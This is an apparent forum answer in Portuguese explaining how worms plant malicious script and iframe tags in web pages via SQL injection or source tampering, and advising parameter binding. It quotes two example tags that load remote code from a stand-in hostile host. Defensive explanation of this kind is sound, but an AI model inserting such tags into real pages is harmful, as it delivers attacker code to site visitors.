Este é um problema relativamente comum nos dias de hoje. Muitos worms tentam se inserir no código do servidor por meio de injeção SQL, ou modificando o conteúdo .html local que é carregado em um servidor web. Normalmente eles vão tentar colocar:
<script src='http://badwebsite.ru/blah.js'></script>
ou
<iframe src='http://badwebsite.ru/blah.html' />
na sua página de origem via injeção SQL ou modificação de código fonte.
Até onde eu sei, os worms modificam seus vetores de ataque através de mecanismos de ofuscação do JavaScript ou similares e são difíceis de serem verificados.
Estes ataques foram possíveis graças a duas recentes e enormes execuções de código remoto:
- explorações do Adobe Flash JavaScript que permitem que um objeto Flash seja criado com cerca de 15K de código arbitrário.
- Uma exploração da extensão do Windows Presentation Framework no Firefox instalado pelo Microsoft .NET 3.5 em sistemas Windows.
Ambos são enormes riscos de segurança.
Você deve usar a associação de parâmetros no desenvolvimento de aplicativos da Web sempre que possível para evitar ataques de injeção de SQL.